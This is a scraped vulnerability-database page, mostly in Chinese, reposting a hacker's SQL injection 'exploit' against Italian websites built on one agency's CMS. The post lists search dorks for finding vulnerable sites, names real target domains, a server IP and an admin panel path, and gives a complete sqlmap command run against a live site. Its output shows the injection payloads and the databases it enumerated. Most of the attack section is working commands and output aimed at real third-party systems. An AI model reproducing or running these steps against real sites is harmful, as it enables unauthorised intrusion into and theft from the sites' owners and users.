投稿
https://cxsecurity.com/issue/WLB-2019110174
alfacommunication.it SQL Injection vulnerability - CXSecurity.com
| 漏洞ID | 1840284 | 漏洞类型 | |
| 发布时间 | 2019-11-29 | 更新时间 | 2019-11-29 |
 CVE编号
|
N/A |  CNNVD-ID
|
N/A |
| 漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title:alfacommunication.it SQL Injection vulnerability
# Date:29/11/2019
# Dork: inurl:detail.php?id= site:.it
inurl:5ad.php?id= site:.it
inurl:single-news.php?id= site:.it
inurl:caseinterno.php?id= site.it
# Exploit Author:H9xHacker
# Tested on:Linux
Reverse check bing.com
ip:54.76.134.14 .php?id= (There are 55 domains hosted on this server.)
# Demo
ediliziafiorentina.it/detail.php?id=19
old.faraone.it/5ad.php?id=319
intesagdi.it/0a-newsdetail.php?id=405
# Admin control panel path
site.it/cms/
# Poc:
sqlmap --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'http://old.faraone.it/5ad.php?id=319' --no-cast --batch --dbs
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=319 AND 7712=7712
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=319 AND (SELECT 9560 FROM (SELECT(SLEEP(5)))ORoc)
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] `cms-faraone`
[*] information_schema
------------------------
video:https://www.youtube.com/watch?v=EEvMO-jyDPE
Greets:To All My Friends检索漏洞
开始时间
结束时间